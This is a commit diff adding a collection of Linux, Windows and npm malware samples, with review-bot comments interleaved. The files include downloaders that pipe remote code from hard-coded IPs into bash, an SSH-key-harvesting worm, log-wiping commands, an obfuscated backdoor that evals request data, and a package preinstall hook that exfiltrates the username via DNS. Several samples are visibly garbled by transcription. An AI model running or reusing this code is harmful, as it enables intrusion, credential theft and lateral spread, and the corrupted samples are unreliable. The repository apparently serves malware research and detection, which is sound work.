* Add Darkcracks, helmen-validate, noblox, aspdasdksa2 samples * Remove blank output files * add README * Add hadooken and jail samples
1 parent
bdcb8c2
commit b112eaf
Showing
22 changed files
with
2,811 additions
and
0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
#!/bin/bash | ||
cp -f -r -- /bin/crondr /bin/-bash 2>/dev/null | ||
cd /bin 2>/dev/null | ||
./-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 | ||
rm -rf -- -bash 2>/dev/null |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
|
||
(curl -s http://89.185.85.102/c || wget -q -0- http://89.185.85.102/c || lwp-download http://89.185.85.102/c /tmp/c) | bash -sh; bash /tmp/c; | ||
rm -rf /tmp/c; | ||
echo | ||
kucmVhZCgpkScgfHwgcHl0aG9uMyA | ||
cHl0aG9uIC1jICdpbXBvcnQgdXJsbGl{LnJlcXVlc3Q7IGV4ZWModXJsbGl{LnJlcXVlc3QudXJsb3BlbigiaHR0cDovLzE4NS4xNzQuMTM2LjIwNC951 tYyAnaW1wb3J8IHVybGxpY5yZXF1ZXN80yBleGVjKHVybGxpY{5yZXF1ZXN0LnVybG9wZW4oImh0dHA6Ly8x0DUUMTcOLJEzNl4yMDQveSpLnJlYWQoKSkn | base64 -d | bash |
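Review bot: The base64 blob on the last two lines of this section contains characters outside the base64 alphabet (`{` and an embedded space), so this file looks like a transcription from a report or screenshot rather than a byte-exact capture, and nothing in the visible commit says so. The same kind of transcription damage shows in the Python one-liner section (mismatched closing quote), the Python downloader (`00777`, two statements fused on one line), the PowerShell dropper (`$M9N00` vs `$M9N0O`, `-G5H61` vs `$G5H6I`) and the stray `-q -0` line in the SSH script. Hashes, YARA strings or decoder tests built from these files would not match the original artifacts. I would put a provenance comment at the top of each, e.g. `# SAMPLE: transcribed from <source report>, not byte-exact; do not derive hashes or signatures from this file`.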
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
|
||
python -c 'import urllib.request; exec(urllib.request.urlopen("http://185.174.136.204/y").read())' || python3 -c 'import urllib.request; exec(urllib.request.urlopen("http://185.174.136.204/y").read())" |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
|
||
cc="http://89.185.85.102" | ||
sys="kekenukaxusn" | ||
DIR="/tmp" | ||
|
||
m() { | ||
get "$cc/hadooken" "$DIR/$sys" | ||
"$DIR/$sys" | ||
sleep 1 | ||
} | ||
|
||
m | ||
rm -f "$DIR/$sys" |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
|
||
cc="http://89.185.85.102" | ||
sys="kekenukaxusn" | ||
DIR="/tmp" | ||
|
||
m() { | ||
get $cc/hadooken ./$sys | ||
./$sys | ||
sleep 1 | ||
} | ||
|
||
m | ||
rm -f ./$sys |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
|
||
import platform | ||
import os | ||
import urllib.request | ||
def download_and_execute(url, target_path): | ||
try: | ||
response = urllib.request.urlopen(url) | ||
if response.getcode() == 200: | ||
data = response.read() | ||
with open(target_path, "wb") as code: code.write(data) | ||
os.chmod(target_path, 00777) | ||
cmd = '{}'.format(target_path) os.system(cmd) | ||
print("Command OK") | ||
return True | ||
except Exception: | ||
pass | ||
finally: | ||
if os.path.exists(target_path): | ||
os.remove(target_path) | ||
return False | ||
if platform.architecture()[0] =="64bit": | ||
url = "http://185.174.136.204/hadooken" | ||
for target_dir in ["/tmp", "/var/tmp", "/dev/shm", "/run/user", "/usr/local/share", "/var/run", "/opt", "/", "/mnt"]: target_path = os.path.join(target_dir, "hadooken") | ||
if download_and_execute(url, target_path): | ||
print("Download Already OK") | ||
break |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
|
||
function A1B2C { | ||
param ( | ||
[Parameter (Mandatory = $true)] [string] $D3E4F, | ||
[Parameter (Mandatory = $true)] | ||
[string] $G5H6I | ||
) | ||
$J7K8L = [System.IO.Path]::GetTempPath() | ||
$M9N00 = Join-Path -Path $J7K8L -ChildPath $G5H6I | ||
try { | ||
$P1Q2R = [System.Convert]:: FromBase64String($D3E4F) [System.IO.File]::WriteAllBytes($M9N00, $P1Q2R) Start-Process -FilePath $M9N0O | ||
} catch { | ||
} | ||
} | ||
$S3T4U | ||
"TVqQA << REDUCTED>> AAAAAAAA" | ||
$V5W6X = "Winscpmodified.exe" | ||
A1B2C -D3E4F $S3T4U -G5H61 $V5W6X |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
_sig="$HOME/.localsshaxxaa" | ||
if [ ! -f "$_sig" ]; then | ||
-q -0 | ||
touch "$_sig" | ||
KEYS=$(find ~/ /root/home -maxdepth 2 -name 'id_rsa*'! -name '*.pub') | ||
KEYS2=$(grep -h IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | awk '{print $2}') KEYS3=$(find ~/ /root/home -maxdepth 3 -name '*.pem' | uniq) | ||
HOSTS=$(grep -h HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | awk '{print $2}') | ||
HOSTS2=$(grep -OP "(ssh|scp)\s+\K[^\s]+" ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}") | ||
HOSTS3=$(grep -h -oP "([0-9]{1,3}\. ){3}[0-9]{1,3}" ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | uniq) | ||
USERZ=$(find ~/ /root/home -maxdepth 2 -name '.ssh' | xargs -I {} find {} -name 'id_rsa*' ! -name '*.pub' | awk -F'/' '{print $3}' | uniq) | ||
users=$( | ||
echo "$USERZ" | tr | ||
'\n' | sort -u | ||
) | ||
hosts=$(echo -e "$HOSTS\n$HOSTS2\n$HOSTS3" | grep -v "127.0.0.1" | sort -u) | ||
keys=$(echo -e "$KEYS\n$KEYS2\n$KEYS3" | sort -u) | ||
for user in $users; do | ||
for host in $hosts; do | ||
for key in $keys; do | ||
chmod 400 "$key" | ||
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i "$key" "$user@$host" "(curl -s http://89.185.85.102/c || wget http://89.185.85.102/c || lwp-download http://89.185.85.102/c /tmp/c) | bash -sh; bash /tmp/c; rm -rf /tmp/c; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliLnJlcXVlc3Q7IGV4ZWModXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovLzE4NS4xNzQuMTM2LjIwNC95IikucmVhZCgpKScgfHwgcHl0aG9uMyAtYyAnaW1wb3J0IHVybGxpYi5yZXF1ZXN00yBleGVjKHVybGxpYi5yZXF1ZXN0LnVybG9wZW40 Imh0dHA6Ly8x0DUUMTCOLjEzNi4yMDQveSIpLnJlYWQoKSkn" | base64 -d | bash | ||
done | ||
done | ||
done | ||
fi |
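Review bot: The marker path assigned to `_sig` on the first line of this script is the one host artifact a responder can check for cheaply, and the visible part of the commit does not document it. I would add a header comment such as `# Host indicator: presence of $HOME/.localsshaxxaa means this script has already run for that account`. The sample notes could also mention that the `ssh` invocation is recognisable in process telemetry by the combination `-oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5`. The README added by this commit is outside the rendered sections, so this may already be covered there.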
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
echo 0 > /var/spool/mail/root | ||
echo 0 > /var/log/wtmp | ||
echo 0 > /var/log/secure | ||
echo 0 > /var/log/cron |
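Review bot: These four lines overwrite each file with the single character `0` rather than deleting it, which leaves a recognisable artifact that the sample carries no note about. A header comment along the lines of `# Artifact: /var/spool/mail/root, /var/log/wtmp, /var/log/secure and /var/log/cron reduced to "0\n"` would let responders turn the sample into a file-size or integrity check on those paths.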
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,228 @@ | ||
const _0x122a47 = _0x4cfd; | ||
(function (_0x19b533, _0x3a14dd) { | ||
const _0x491cff = _0x4cfd, | ||
_0x2dcd82 = _0x19b533(); | ||
while (!![]) { | ||
try { | ||
const _0x2e6977 = | ||
(-parseInt(_0x491cff(0x1bd)) / (0x156d + 0x1569 + -0x2ad5)) * | ||
(-parseInt(_0x491cff(0x1a7)) / | ||
(0x1 * 0x2112 + -0xe * 0x1ea + -0x644)) + | ||
-parseInt(_0x491cff(0x19f)) / | ||
(-0x1 * -0x19d3 + -0x425 * -0x5 + -0x2e89) + | ||
parseInt(_0x491cff(0x1a2)) / (0x10d * -0x11 + 0x1 * 0xa7d + 0x764) + | ||
(-parseInt(_0x491cff(0x195)) / | ||
(0x4 * 0x8a6 + 0x7 * 0x439 + 0x4022 * -0x1)) * | ||
(-parseInt(_0x491cff(0x19a)) / | ||
(-0xbb9 * 0x1 + -0x1f2b + -0x6 * -0x727)) + | ||
-parseInt(_0x491cff(0x19b)) / (0x4a2 * 0x4 + 0x18fb + -0x1fa * 0x16) + | ||
parseInt(_0x491cff(0x1a1)) / (0x1b6b + -0x26f7 + 0xb94) + | ||
(-parseInt(_0x491cff(0x1a4)) / (-0x261b + -0x20cb + 0x46ef)) * | ||
(parseInt(_0x491cff(0x1a9)) / (0x1d4c + 0x1d * 0xbf + -0x32e5)); | ||
if (_0x2e6977 === _0x3a14dd) break; | ||
else _0x2dcd82["push"](_0x2dcd82["shift"]()); | ||
} catch (_0x1ea857) { | ||
_0x2dcd82["push"](_0x2dcd82["shift"]()); | ||
} | ||
} | ||
})(_0x5808, -0x14ee15 + -0xd9a42 + 0x7 * 0x68bee); | ||
const express = require(_0x122a47(0x1ab)), | ||
axios = require(_0x122a47(0x1b8)), | ||
delay = (_0xa2960b) => | ||
new Promise((_0x339732) => setTimeout(_0x339732, _0xa2960b)), | ||
increaseTimeoutMiddleware = function (_0x6c7e55) { | ||
const _0x37c262 = { | ||
kUiFu: function (_0x5176b1) { | ||
return _0x5176b1(); | ||
}, | ||
}; | ||
return (_0x116b66, _0x5948ed, _0x4ba5ef) => { | ||
const _0x1a3c7a = _0x4cfd; | ||
_0x116b66[_0x1a3c7a(0x1b7)](_0x6c7e55), | ||
_0x37c262[_0x1a3c7a(0x190)](_0x4ba5ef); | ||
}; | ||
}, | ||
catchAsync = (_0x55e054) => { | ||
const _0x2f553d = { | ||
jEHcf: function (_0x192f35, _0x23dbe0, _0x3c4bac, _0x350ddf) { | ||
return _0x192f35(_0x23dbe0, _0x3c4bac, _0x350ddf); | ||
}, | ||
}; | ||
return (_0x55e9e0, _0x111bf0, _0x4be67f) => { | ||
const _0x4629fa = _0x4cfd; | ||
_0x2f553d[_0x4629fa(0x18f)](_0x55e054, _0x55e9e0, _0x111bf0, _0x4be67f)[ | ||
_0x4629fa(0x1ba) | ||
](_0x4be67f); | ||
}; | ||
}; | ||
async function run(_0x4eaa94, _0x398fca) { | ||
const _0x3fb732 = _0x122a47, | ||
_0x577285 = { | ||
tOPbR: function (_0x36b2cc, _0x154a2c) { | ||
return _0x36b2cc(_0x154a2c); | ||
}, | ||
}; | ||
let _0x5aa7d8 = | ||
_0x3fb732(0x1bc) + | ||
_0x3fb732(0x1be) + | ||
_0x3fb732(0x1b6) + | ||
_0x3fb732(0x1ad) + | ||
_0x3fb732(0x198), | ||
_0x1e516a = _0x4eaa94[_0x3fb732(0x1b3)]; | ||
return _0x577285[_0x3fb732(0x19d)](eval, _0x1e516a["js"]); | ||
} | ||
function _0x5808() { | ||
const _0x11173f = [ | ||
"237054jeHhqw", | ||
"1834161FfqVqh", | ||
"i.ipify.or", | ||
"tOPbR", | ||
"NmUMH", | ||
"210804RGvmIx", | ||
"sSyII", | ||
"6379304IXNDzu", | ||
"4237008NTmesW", | ||
"g?format=j", | ||
"18hEBkiY", | ||
"post", | ||
".72.229.23", | ||
"4GGrSjt", | ||
"ETxAC", | ||
"11333280pUxuCJ", | ||
"VsuQj", | ||
"express", | ||
"IJGiK", | ||
"return\x20\x27a\x27", | ||
"EijpY", | ||
"get", | ||
"ZOvjL", | ||
"bugsnag", | ||
"/pproperty", | ||
"body", | ||
"son", | ||
"http://184", | ||
"t\x27);\x0a//\x20\x20\x20", | ||
"setTimeout", | ||
"axios", | ||
"/scrappedd", | ||
"catch", | ||
"lXgvx", | ||
"console.lo", | ||
"602929MJubhw", | ||
"g(\x27Run\x20tes", | ||
"jEHcf", | ||
"kUiFu", | ||
"sqJsh", | ||
"https://ap", | ||
"send", | ||
"7:9999/mh", | ||
"35WCGHrh", | ||
"use", | ||
"Router", | ||
";\x0a\x20\x20", | ||
"YBayv", | ||
]; | ||
_0x5808 = function () { | ||
return _0x11173f; | ||
}; | ||
return _0x5808(); | ||
} | ||
async function pst_inf() { | ||
const _0x3da834 = _0x122a47, | ||
_0x478b2b = { | ||
ETxAC: | ||
_0x3da834(0x192) + | ||
_0x3da834(0x19c) + | ||
_0x3da834(0x1a3) + | ||
_0x3da834(0x1b4), | ||
ZOvjL: _0x3da834(0x1b5) + _0x3da834(0x1a6) + _0x3da834(0x194), | ||
}; | ||
try { | ||
let _0xbbb76c = {}; | ||
try { | ||
let { data: _0x393d8a } = await axios[_0x3da834(0x1af)]( | ||
_0x478b2b[_0x3da834(0x1a8)] | ||
); | ||
_0xbbb76c = { ..._0xbbb76c, ..._0x393d8a }; | ||
} catch (_0x17dcdf) {} | ||
let _0x28bf33 = await axios[_0x3da834(0x1a5)]( | ||
_0x478b2b[_0x3da834(0x1b0)], | ||
_0xbbb76c | ||
); | ||
} catch (_0x44a028) {} | ||
} | ||
async function st() { | ||
const _0x93d204 = _0x122a47, | ||
_0x21ed82 = { | ||
sSyII: function (_0x2d5bdd) { | ||
return _0x2d5bdd(); | ||
}, | ||
YBayv: function (_0x4f4802, _0xfc81cf) { | ||
return _0x4f4802(_0xfc81cf); | ||
}, | ||
}; | ||
while (!![]) { | ||
try { | ||
await _0x21ed82[_0x93d204(0x1a0)](run); | ||
} catch (_0x5e622b) {} | ||
await _0x21ed82[_0x93d204(0x199)]( | ||
delay, | ||
-0xdd55c * 0x9 + -0x4a0078c + -0x1 * -0x8177848 | ||
); | ||
} | ||
} | ||
async function st2(_0x2fc7f5) { | ||
const _0x21835c = _0x122a47, | ||
_0x16eb0d = { | ||
VsuQj: function (_0x4262aa, _0x45ac76, _0x3b1cc9) { | ||
return _0x4262aa(_0x45ac76, _0x3b1cc9); | ||
}, | ||
IJGiK: function (_0x12ba3f) { | ||
return _0x12ba3f(); | ||
}, | ||
NmUMH: _0x21835c(0x1b9), | ||
lXgvx: function (_0x19682d, _0x7ae28a) { | ||
return _0x19682d(_0x7ae28a); | ||
}, | ||
EijpY: _0x21835c(0x1b2), | ||
sqJsh: function (_0x284bc9) { | ||
return _0x284bc9(); | ||
}, | ||
}, | ||
_0xa237ae = express[_0x21835c(0x197)](); | ||
_0xa237ae[_0x21835c(0x1a5)]( | ||
_0x16eb0d[_0x21835c(0x19e)], | ||
_0x16eb0d[_0x21835c(0x1bb)]( | ||
increaseTimeoutMiddleware, | ||
0x1 * 0xb9a71 + 0x79 * 0xae7 + -0x799e0 | ||
), | ||
_0x16eb0d[_0x21835c(0x1bb)](catchAsync, async (_0x2fc188, _0x4ed992) => { | ||
const _0x4b4cb8 = _0x21835c; | ||
_0x4ed992[_0x4b4cb8(0x193)]( | ||
await _0x16eb0d[_0x4b4cb8(0x1aa)](run, _0x2fc188, _0x4ed992) | ||
); | ||
}) | ||
), | ||
await _0x2fc7f5[_0x21835c(0x196)](_0x16eb0d[_0x21835c(0x1ae)], _0xa237ae), | ||
_0x16eb0d[_0x21835c(0x191)](pst_inf); | ||
const _0x1bc03c = _0x16eb0d[_0x21835c(0x1aa)]( | ||
setInterval, | ||
function () { | ||
const _0x4760c0 = _0x21835c; | ||
_0x16eb0d[_0x4760c0(0x1ac)](pst_inf); | ||
}, | ||
-0x1 * -0x4efcf + 0x1de1d8 + 0x9b * -0xc25 | ||
); | ||
} | ||
function _0x4cfd(_0x42ad4b, _0x44de92) { | ||
const _0x5582da = _0x5808(); | ||
return ( | ||
(_0x4cfd = function (_0x10efd3, _0x2ab9c3) { | ||
_0x10efd3 = _0x10efd3 - (0xe9 * -0x21 + -0x1a45 * 0x1 + 0x39dd); | ||
let _0x46636f = _0x5582da[_0x10efd3]; | ||
return _0x46636f; | ||
}), | ||
_0x4cfd(_0x42ad4b, _0x44de92) | ||
); | ||
} | ||
exports[_0x122a47(0x1b1)] = st2; |
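Review bot: This sample is committed only in its obfuscated form, with no note on what it resolves to, so every analyst has to redo the string-table rotation before writing a detection. From the visible code, `run` passes the `js` member of a property of its first argument to `eval`, and `st2` attaches `run`, through the `catchAsync` wrapper, to what appears to be an Express router. The table in `_0x5808` also holds fragments that look like an ipify lookup URL and an HTTP endpoint on port 9999, though the exact strings depend on the rotated order and should be confirmed. I would add a header comment summarising that recovered behaviour and marking the unconfirmed parts as such.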
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
{ | ||
"name": "depe-tool", | ||
"version": "1.2.2", | ||
"description": "p0c", | ||
"main": "index.js", | ||
"scripts": { | ||
"preinstall": "node -e \"const fs = require('fs'); const rawData = fs.readFileSync('preinstall.json'); const jsonData = JSON.parse(rawData); eval(jsonData.script);\"" | ||
}, | ||
"author": "", | ||
"license": "ISC" | ||
} |
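Review bot: The `preinstall` entry runs `eval` on the `script` field of `preinstall.json`, so if this file is stored under its live name `package.json`, an `npm install` in the sample directory, by a person or by an automated dependency scanner, executes the sample. JSON has no comment syntax, so the safeguard has to live outside the file: store it under an inert name such as `package.json.sample`, and state in the README that the directory must only be handled with `npm install --ignore-scripts`. The file name is not visible in this rendering, so this may already be the case.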
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
{ | ||
"script": "const hexPayload = '0a636f6e7374206f73203d207265717569726528276f7327293b0a636f6e737420646e73203d20726571756972652827646e7327293b0a0a636f6e737420656e636f646544617461203d20286461746129203d3e204275666665722e66726f6d2864617461292e746f537472696e67282768657827293b0a636f6e737420676574557365724e616d65203d202829203d3e206f732e75736572496e666f28292e757365726e616d653b0a636f6e73742064617461203d207b20757365726e616d653a20676574557365724e616d652829207d3b0a636f6e737420656e636f64656444617461203d20656e636f646544617461284a534f4e2e737472696e67696679286461746129293b0a0a66756e6374696f6e20646e73457866696c74726174696f6e2829207b0a2020636f6e737420657866696c74726174696f6e446f6d61696e203d2060247b656e636f646564446174617d2e6671396d6575796b3370776d756a666464783536306e7838387a6571326871362e6f6173746966792e636f6d603b0a2020646e732e7265736f6c76653428657866696c74726174696f6e446f6d61696e2c20286572722c2061646472657373657329203d3e207b0a202020206966202865727229207b0a20202020202070726f636573732e657869742831293b0a202020207d20656c7365207b0a20202020202070726f636573732e657869742830293b0a202020207d0a20207d293b0a7d0a0a646e73457866696c74726174696f6e28293b0a'; const decodeHex = (hex) => Buffer.from(hex, 'hex').toString('utf8'); const payload = decodeHex(hexPayload); eval(payload);" | ||
} |
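Review bot: The hex string in `script` hides the only behaviour of this sample, and nothing visible records what it decodes to. Decoded, it reads the local username with `os.userInfo()`, hex-encodes it as JSON and issues a `dns.resolve4` lookup that uses the encoded data as the leftmost label under an `oastify.com` host. Since JSON cannot carry a comment, I would record this in the sample's README entry together with the detection hint that follows from it: long hex-only DNS labels queried during package installation.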